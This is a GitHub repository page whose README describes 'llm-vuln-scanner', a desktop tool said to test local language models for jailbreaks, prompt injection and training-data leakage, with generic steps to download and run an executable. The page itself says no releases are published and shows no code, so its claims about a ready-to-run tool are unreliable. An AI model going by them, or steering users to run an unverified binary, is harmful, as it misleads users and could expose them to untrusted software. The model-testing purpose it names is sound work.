Skip to content

πŸ” Enhance local LLM security by testing for vulnerabilities like prompt injection, model inversion, and data leakage with this robust toolkit.

License

Notifications You must be signed in to change notification settings

pepoanas/llm-vuln-scanner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

10 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ›‘οΈ llm-vuln-scanner - Scan LLMs for Security Risks

Download llm-vuln-scanner

πŸ“– Introduction

The llm-vuln-scanner is a security tool designed to evaluate local large language models (LLMs) for potential vulnerabilities. It identifies risks such as jailbreaks, prompt injection, training data leakage, and adversarial abuse. With this tool, you can enhance the security of your AI models with ease.

πŸš€ Getting Started

To use the llm-vuln-scanner, follow these simple steps:

1. System Requirements

Ensure your computer meets the following requirements:

  • Operating System: Windows 10 or later, macOS 10.15 or later, or a recent Linux distribution.
  • RAM: Minimum of 4 GB. Recommended 8 GB or more.
  • Disk Space: At least 100 MB of free space.

2. Downloading the Scanner

To get your copy of the llm-vuln-scanner, visit the releases page. You will find the latest version available for download.

3. Install the Scanner

After downloading the zip file:

  • On Windows:

    • Extract the contents of the zip file to a folder.
    • Open the folder and find the executable file named llm-vuln-scanner.exe.
  • On macOS:

    • Extract the zip file and open the folder.
    • Move llm-vuln-scanner.app to your Applications folder.
  • On Linux:

    • Extract the zip file and navigate to the folder.
    • Open a terminal and run the command: ./llm-vuln-scanner.

4. Running the Scanner

After installation is complete, you can run the scanner:

  • Windows: Double-click the llm-vuln-scanner.exe file.
  • macOS: Open llm-vuln-scanner.app from your Applications folder.
  • Linux: In the terminal, type ./llm-vuln-scanner and press Enter.

The scanner will launch, and you will see a user-friendly interface.

πŸ” Using the Scanner

The llm-vuln-scanner features an intuitive dashboard. To start a scan:

  1. Select the model you wish to analyze.
  2. Click on the "Start Scan" button.

The scanner will examine your LLM for several factors:

  • Jailbreak Resilience: Tests if the model can be manipulated to bypass security measures.
  • Prompt Injection: Checks for vulnerabilities that allow unwanted responses from the model.
  • Training Data Leakage: Identifies if sensitive data from training sets can be exposed.
  • Adversarial Abuse: Evaluates the model's response to malicious inputs.

After the scan completes, you will receive a detailed report summarizing the results.

πŸ“Š Understanding Scan Results

The results will include sections such as:

  • Summary: A quick overview of the scan findings.
  • Detailed Findings: In-depth analysis of each vulnerability.
  • Recommendations: Suggestions for improving the security of your LLM.

Take your time to review the report carefully. Following the recommendations will help secure your model from potential threats.

❓ Frequently Asked Questions

Q: Can I use this tool on multiple models?

A: Yes, you can analyze multiple LLMs using the scanner.

Q: Is the tool safe to use?

A: This tool is designed to enhance security. However, always ensure your software is up to date and run scans in a safe environment.

Q: Does it work on cloud-based models?

A: Currently, the scanner is designed for local LLMs. Cloud models may require different security measures.

πŸ“₯ Download & Install

To download the llm-vuln-scanner, please visit the releases page. From there, you can access the latest version and start securing your models today.

πŸ› οΈ Contributing

If you want to contribute to the development of llm-vuln-scanner, feel free to submit issues or pull requests on GitHub. We welcome suggestions for improvements.

πŸ™ Acknowledgments

Thank you to everyone who has contributed to this project. Your support helps create a safer AI environment.

πŸ—‚οΈ Topics

  • ai
  • ai-jailbreak-prompts
  • ai-vulnerability-assessment
  • jailbreak
  • llm
  • llm-pentesting
  • llm-vulnerabilities
  • llmstudio
  • ollama
  • pentest
  • pentesting-tools
  • red-team-tools
  • scanning
  • vulnerability

For more detailed information on each topic, check related projects and documentation available in this repository.

About

πŸ” Enhance local LLM security by testing for vulnerabilities like prompt injection, model inversion, and data leakage with this robust toolkit.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages